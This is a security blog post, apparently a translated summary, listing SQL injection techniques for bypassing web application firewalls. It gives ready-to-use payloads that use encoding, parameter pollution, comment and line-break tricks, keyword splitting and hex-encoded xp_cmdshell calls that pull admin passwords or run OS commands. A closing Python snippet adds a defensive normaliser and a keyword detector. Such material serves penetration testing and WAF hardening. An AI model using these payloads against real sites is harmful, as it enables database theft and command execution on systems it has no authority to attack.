[SQL Injection] Techniques for bypassing a WAF
This article is a summary of the various methods for bypassing a WAF. The methods below can be used when testing WAF bypasses; I hope they are useful to everyone.
URL encode (URL encoding)
original payload:
?id=1 union select pass from admin limit 1
encode payload:
id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31
Unicode encode (Unicode encoding)
original payload: ?id=1 union select pass from admin limit 1
encode payload: ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1
HTTP parameter pollution / complex parameter bypass
?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17,18&id=19%20from%28admin%29%29
?id=1&id=1//And//1=2//Union//Select/**/1,concat%28database%28%29,0x3a,user%28%29,0x3a,version%28%29%29,3
?id=1 union select 1&id=pass from admin
Special character pollution bypass
//%00 is equivalent to NULL: the whitespace is truncated, and when the WAF parses the URL parameters, spaces are replaced with /**/ or with %n%d. [NULL] ;%00 ;\x00, ||….
Search engine whitelist bypass, proxy bypass
Request method bypass
Change GET to POST, POST to GET …
GET /id=1 union select 1,2,3,4
POST id=1 union select 1,2,3,4
Encoding Bypass (urlencoded/form-data) (encoding bypass)
The keyword split bypass (keyword splitting)
?id=1;EXEC(‘ma’+’ster..x’+’p_cm’+’dsh’+’ell “net user”‘)
Database special syntax bypass
?id=1.union%0aselect@1,2 ,!3,4
Use comment statements to bypass
UNION /**/Select/**/user,pwd,from tbluser
HEX bypass (hex bypass)
0x730079007300610064006D0069006E00 =hex(sysadmin) 0x640062005F006F0077006E0065007200 =hex(db_owner)
?id=1;declare%20@a%20sysname%20select
@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 exec master.dbo.xp_cmdshell @a;–
GET Parameter SQL Injection %0A Line Break Pollution Bypass (SQL injection via line-break pollution of GET parameters)
?id=-11%0Aunion%0Aselect 1,2,3,4
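Every technique above works against a filter that matches keywords on the raw request string. As an added example (not code from the original post), here is the normalisation a WAF or detection rule has to run first: percent-decoding, IIS-style %uXXXX decoding, NULL-byte removal, inline-comment stripping, whitespace collapsing, and joining duplicated parameters with a comma the way ASP.NET does. The sample inputs are the payloads listed on this page; the keyword pattern is deliberately small and only illustrative.

```python
import re
from urllib.parse import unquote

# IIS-style %uXXXX escapes: urllib.parse.unquote does not decode them
_UNICODE_ESC = re.compile(r"%u([0-9a-fA-F]{4})")
_INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Illustrative pattern only; a real rule set is far larger
_SQLI = re.compile(r"\bunion\b\W*\bselect\b|\bexec\b|xp_cmdshell")


def normalize(raw: str, max_rounds: int = 3) -> str:
    """Canonicalise a query string before any keyword matching."""
    s = raw
    for _ in range(max_rounds):            # repeat to undo double encoding
        decoded = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), unquote(s))
        if decoded == s:
            break
        s = decoded
    s = s.replace("\x00", "")              # %00 must not truncate the match
    s = _INLINE_COMMENT.sub(" ", s)        # UNION/**/SELECT -> UNION SELECT
    s = re.sub(r"\s+", " ", s)             # %0A, tabs, etc. -> one space
    return s.strip().lower()


def merge_hpp(query: str) -> dict:
    """Join repeated parameters with ',' (ASP.NET/IIS behaviour), so that
    'id=1 union select 1&id=pass from admin' is inspected as one value."""
    params: dict = {}
    for pair in query.lstrip("?").split("&"):
        key, _, value = pair.partition("=")
        params[key] = params[key] + "," + value if key in params else value
    return params


def looks_like_sqli(raw: str) -> bool:
    merged = "&".join(f"{k}={v}" for k, v in merge_hpp(raw).items())
    return bool(_SQLI.search(normalize(merged)))


if __name__ == "__main__":
    # Constructed sample inputs, taken from the payloads listed on this page
    samples = [
        "?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1",
        "?id=1 union select 1&id=pass from admin",
        "UNION /**/Select/**/user,pwd,from tbluser",
        "?id=-11%0Aunion%0Aselect 1,2,3,4",
        "?id=1&name=john",
    ]
    for s in samples:
        print(looks_like_sqli(s), normalize(s))
```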
https://securityonline.info/2016/11/08/sql-injection-some-techique-to-bypass-waf/